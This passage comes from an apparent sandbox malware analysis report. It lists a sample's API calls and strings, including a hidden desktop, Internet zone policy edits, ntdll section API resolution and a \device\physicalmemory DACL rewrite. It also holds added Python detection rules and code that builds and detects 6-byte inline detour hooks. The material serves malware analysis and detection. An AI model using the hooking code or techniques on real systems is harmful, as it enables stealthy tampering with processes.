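    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\)\s*,)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

SE_KERNEL_OBJECT = 6  # object-type argument of GetSecurityInfo/SetSecurityInfo
SECTION_NTAPIS = {"NtOpenSection", "NtMapViewOfSection", "NtUnmapViewOfSection"}


def parse_api_lines(text):
    """Turn the bullet lines of one report record into a list of call dicts."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "name": m.group("name"),
            "module": m.group("module").upper(),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def rule_ntdll_section_apis(calls):
    """ntdll.dll handle plus GetProcAddress on at least two of the section Nt* APIs."""
    loads_ntdll = any(c["name"] in ("GetModuleHandleA", "LoadLibraryA")
                      and c["args"][:1] == ["ntdll.dll"] for c in calls)
    resolved = {c["args"][1] for c in calls
                if c["name"] == "GetProcAddress" and len(c["args"]) >= 2}
    hits = sorted(resolved & SECTION_NTAPIS)
    return loads_ntdll and len(hits) >= 2, hits


def rule_physicalmemory_dacl(calls, strings):
    """DACL rewrite of a kernel object (type 6) beside the \\device\\physicalmemory name."""
    names = {c["name"] for c in calls}
    acl_seq = {"GetSecurityInfo", "SetEntriesInAclA", "SetSecurityInfo"} <= names
    kernel_obj = any(c["name"] in ("GetSecurityInfo", "SetSecurityInfo")
                     and c["args"][1:2] == [f"{SE_KERNEL_OBJECT:08X}"] for c in calls)
    physmem = any(s.lower().endswith("\\device\\physicalmemory") for s in strings)
    return acl_seq and kernel_obj and physmem


def evaluate(record_text, strings=()):
    """Names of the rules that fire on one record (its API bullets plus its String ID list)."""
    calls = parse_api_lines(record_text)
    fired = []
    ok, _ = rule_ntdll_section_apis(calls)
    if ok:
        fired.append("ntdll_section_api_resolution")
    if rule_physicalmemory_dacl(calls, strings):
        fired.append("physicalmemory_dacl_rewrite")
    return fired


# Constructed input: the two records copied from this report (the subcalls of
# function 00402822, and the GetSecurityInfo function at 00402976).
RECORD_NTDLL = r"""
• Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
• Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
• Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
• Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
• Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
• Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
• GetVersion.KERNEL32 ref: 00402E22
• LoadLibraryA.KERNEL32 ref: 00402E91
• GetProcAddress.KERNEL32 ref: 00402EC5
• IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
• GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
• CloseHandle.KERNEL32(?), ref: 00403065
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
• IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
"""
RECORD_PHYSMEM = r"""
• GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
• SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
• SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
• CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
"""
# The report joins a record's strings with "$" in its "String ID" line.
STRINGS_PHYSMEM = r"@$CURRENT_USER$\device\physicalmemory".split("$")

if __name__ == "__main__":
    print(evaluate(RECORD_NTDLL))                     # ['ntdll_section_api_resolution']
    print(evaluate(RECORD_PHYSMEM, STRINGS_PHYSMEM))  # ['physicalmemory_dacl_rewrite']
```

The bullets carry call names, arguments and the calling address but no return values, so the rule cannot tell whether NtOpenSection actually succeeded; use it to triage which records deserve a look, and confirm execution against the report's dynamic API trace. Further records from this page can be fed to evaluate() with their own "String ID" list split on "$".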
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • yes, xrefs: 0040510E
                             • 1601 (URLACTION_HTML_SUBMIT_FORMS, the per-zone "Submit non-encrypted form data" policy value), xrefs: 004050D4
                            • BrowseNewProcess, xrefs: 00405113
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • GlobalUserOffline, xrefs: 004050FA
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
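A memset with fill byte 00000090 (the x86 NOP) and length 8, followed by a memcpy of exactly 6 bytes into the location the report renders as -0042AA50, has the shape of an inline detour: an 8-byte scratch buffer is NOP-filled, a short jump is assembled in it, and the first 6 bytes of the target are overwritten. The report shows neither the 6 bytes nor their destination, so the two patch forms below (E9 rel32 padded with one NOP, and push imm32 / ret) are my assumptions about what a 6-byte detour usually contains, not something read from the sample. The following is an added example, my code rather than the report's or the sample's, that builds both forms over a constructed prologue and performs the check a responder runs over a dumped API prologue to recover the hook target; the module base, function address and hook address are made up.

```python
import struct

NOP = 0x90          # the fill byte the sample passes to memset before patching
PATCH_LEN = 6       # number of bytes the sample's memcpy writes over the target


def build_jmp_detour(target_va, hook_va, width=PATCH_LEN):
    """E9 rel32 to hook_va, NOP-padded to `width` bytes, as it would sit at target_va."""
    rel = hook_va - (target_va + 5)          # rel32 is relative to the end of the 5-byte jmp
    patch = b"\xE9" + struct.pack("<i", rel)
    return patch.ljust(width, bytes([NOP]))


def build_push_ret_detour(hook_va):
    """68 imm32 / C3: an absolute 6-byte detour that needs no relative fixup."""
    return b"\x68" + struct.pack("<I", hook_va) + b"\xC3"


def patch_region(image, target_va, base_va, patch):
    """Write `patch` into a bytes image at target_va (image starts at base_va); returns a copy."""
    off = target_va - base_va
    buf = bytearray(image)
    buf[off:off + len(patch)] = patch
    return bytes(buf)


def detect_inline_hook(prologue, func_va):
    """Classify the first bytes of a function: (kind, target_va) for a detour, None if clean."""
    b = prologue
    if len(b) >= 5 and b[0] == 0xE9:                   # jmp rel32
        return "jmp_rel32", (func_va + 5 + struct.unpack("<i", b[1:5])[0]) & 0xFFFFFFFF
    if len(b) >= 6 and b[0] == 0x68 and b[5] == 0xC3:  # push imm32 ; ret
        return "push_ret", struct.unpack("<I", b[1:5])[0]
    if len(b) >= 6 and b[0] == 0xFF and b[1] == 0x25:  # jmp dword ptr [abs32]
        return "jmp_indirect", struct.unpack("<I", b[2:6])[0]
    if len(b) >= 2 and b[0] == 0xEB:                   # jmp rel8 (hot-patch style)
        return "jmp_rel8", (func_va + 2 + struct.unpack("<b", b[1:2])[0]) & 0xFFFFFFFF
    return None


# Constructed sample: a clean 'push ebp; mov ebp,esp; sub esp,0x40' prologue at an
# assumed VA, then the same bytes after a 6-byte detour to an assumed hook address.
BASE_VA = 0x77E00000                       # assumed module base
FUNC_VA = BASE_VA + 0x1234                 # assumed address of the hooked export
HOOK_VA = 0x00403C80                       # assumed hook address inside the sample's image
CLEAN = bytes.fromhex("558BEC83EC40") + bytes([NOP]) * 10
HOOKED = patch_region(CLEAN, FUNC_VA, FUNC_VA, build_jmp_detour(FUNC_VA, HOOK_VA))

if __name__ == "__main__":
    print(detect_inline_hook(CLEAN, FUNC_VA))    # None
    print(detect_inline_hook(HOOKED, FUNC_VA))   # ('jmp_rel32', 4209792)
```

When running this over a live or dumped process, compare each export's first bytes against the same bytes in the on-disk copy of the DLL (after relocation) rather than relying on the opcode patterns alone: legitimate hot-patching and some security products also start exports with a jump, and the decisive question is whether the jump target lies inside any loaded module or, as here, inside the sample's own image.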
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                             • {9BA05972-F6A8-11CF-A442-00A0C90A8F39} (CLSID_ShellWindows, the collection used to enumerate open Explorer and Internet Explorer windows), xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
